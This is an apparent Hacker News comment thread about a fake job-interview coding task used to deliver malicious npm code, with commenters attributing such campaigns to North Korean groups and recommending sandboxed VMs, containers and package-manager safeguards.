Anatomy of a Failed (Nation-State?) Attack(grack.com)
82 pointsby signa1110 hours ago8 comments
  • sneakerblack3 hours ago
    This all stinks of Lazarus:

    https://en.wikipedia.org/wiki/Lazarus_Group

    I've done incident responses for this exact type of attack multiple times. They've gotten much better organized lately and will often contact developers directly (over LinkedIn or WhatsApp) to run this type of attack. (Although, usually pretending to run a test for a job interview -- which is maybe why the author was confused about the code)

    • krisboltonan hour ago
      100%. I can't find it now, but someone last month posted a similar story on HN. The threat actor had stolen someone's GitHub account and altered their otherwise legitimate looking repo. They'll expend a lot of effort in order to masquerade and trick you. TraderTraitor is another good DPRK example.

      Anyone reading - if you're ever a victim, worth reporting to your national CERT and your org. The CERT can provide advice, it's useful for their threat intel, and your org can check their systems. You might not be the end target.

  • ThreatSystems6 hours ago
    I run training courses on developer security to broaden their understanding of threat surface from their behaviour, day-to-day tooling, the repositories they work on and broader supply chain. One of the modules covers this exact scenario, it's amazing how many people do these exercises on corporate machines let alone their personal device!

    There are mitigations you can put in place by using containers, virtual machines or even the execution environment e.g. Deno's ability to block/whitelist network calls[0], Bun's --ignore-scripts [1] and supply chain package managers have made some strides here like pnpm [2]. But it's knowing your threat surface and how to use your tooling which can be quite overbearing on cognitive load, especially in fast paced scenarios like "job of a lifetime offer!" from linked in.

    Easiest way by default is to use ephemeral VMs / Sandbox Containers for such tasks which don't have mounted directories to your system etc. Or spin up a cheap EC2 / VPS to work on them in a short period of time.

    [0] - https://deno.com/blog/deno-protects-npm-exploits and https://docs.deno.com/runtime/fundamentals/security/

    [1] - https://bun.com/docs/pm/lifecycle

    [2] - https://pnpm.io/supply-chain-security

    [2] - https://

  • tptacek7 hours ago
    I snagged right away at "the kind of low-level reliability judgment that most teams only notice when something breaks." Real people don't talk like the J. Peterman catalog.
    • close042 hours ago
      At this point it’s safe to assume most articles get the AI touch-up because the authors think that polish is worth it.

      But what’s worse is the millionth “haw haw, it was made with AI” comment. Use your expertise to tell us if the article’s analysis is any good, not if the author used a “fancy narration” filter. “AI detectors” are a dime a dozen.

      • isaachh2 hours ago
        Thats a quote from the attacker, not part of the article itself. I don't think they are suggesting the article was AI written.
  • Muromec5 hours ago
    I had an email like that last week, where sender claimed to be from Singapore, but the company and the person were not searchable on the blue site and their interview scheduling link didn't match Singapore timezone, while the domain was registered through an Indian registrar. The email didn't sound right somehow.

    I almost scheduled a call with them and even self-explained that of course they would be on Pacific time, it's where the money is.

    I do have some npm packages under my name and they found me through github, so here is that.

  • bobkb6 hours ago
    This type of attack is going on for few years now. I had 2 in my credit.

    Some details https://freebird.in/malicious-code-source-code-shared-via-jo...

  • bstsb4 hours ago
    wow, this is actually a really impressive attack - a far cry from the obfuscated postinstall hooks seen a million times before.

    the only real long-term solution to node-based attacks like this is to run any remote code in a container, or even a VM?

  • timfsu8 hours ago
    Wow, this is pretty scary. LLMs have made phishing attempts look so much more legit, and the damage they can do so much greater.
    • 4 hours ago
      undefined
  • nesarkvechnep8 hours ago
    [flagged]
    • OsrsNeedsf2P6 hours ago
      I found them refreshing and hacker vibes. I understand that's not welcome on HN though
    • ggm7 hours ago
      Blame post modernism.